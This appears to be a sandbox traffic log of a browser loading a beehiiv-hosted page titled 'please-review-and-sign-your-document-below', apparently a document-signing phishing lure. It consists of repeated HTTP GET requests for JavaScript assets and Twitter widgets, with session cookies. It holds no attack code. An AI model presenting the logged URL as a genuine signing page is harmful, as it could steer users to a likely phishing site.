Source: global trafficHTTP traffic detected: GET /assets/index-x2da_zcv.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/components-Oj2xMfGE.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/WebThemeContext-DttfuZxo.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/keyboard-CaEu2o0u.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-BdpAPpdN.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /widgets/widget_iframe.2f70fb173b9000da126c79afe2098f02.html?origin=https%3A%2F%2Fkanes-newsletter-871ead.beehiiv.com HTTP/1.1Host: platform.twitter.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://kanes-newsletter-871ead.beehiiv.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/use-is-mounted-BaHv16bB.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /widgets.js HTTP/1.1Host: platform.twitter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/bugs-DVQzBh-s.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/transition-y-5XFFuu.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useTranslation-CfKJAmGY.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/hidden-KuoXmiN5.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/StatusInputs-JkVhk_jg.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-CqJN8iQq.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/PageProvider-uKxoiNdl.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useToast-DK42uF07.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/YoutubeIcon-DSouMQiN.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/use-root-containers-DmyWFwuo.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/WebThemeContext-DttfuZxo.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/use-tree-walker-Inv4mdsP.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-CJHGmWl4.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useIsLoggedIn-BbU3-q43.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/keyboard-CaEu2o0u.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-EzvqLY92.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/transition-y-5XFFuu.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/use-is-mounted-BaHv16bB.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/bugs-DVQzBh-s.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/hidden-KuoXmiN5.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/Input-snMSpc3o.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /settings?session_id=5014ff864e2c4e055ad43236486b600cbc96bac6 HTTP/1.1Host: syndication.twitter.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://platform.twitter.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://platform.twitter.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/RedirectToHiddenInput-mUb4yii7.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/YoutubeIcon-DSouMQiN.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
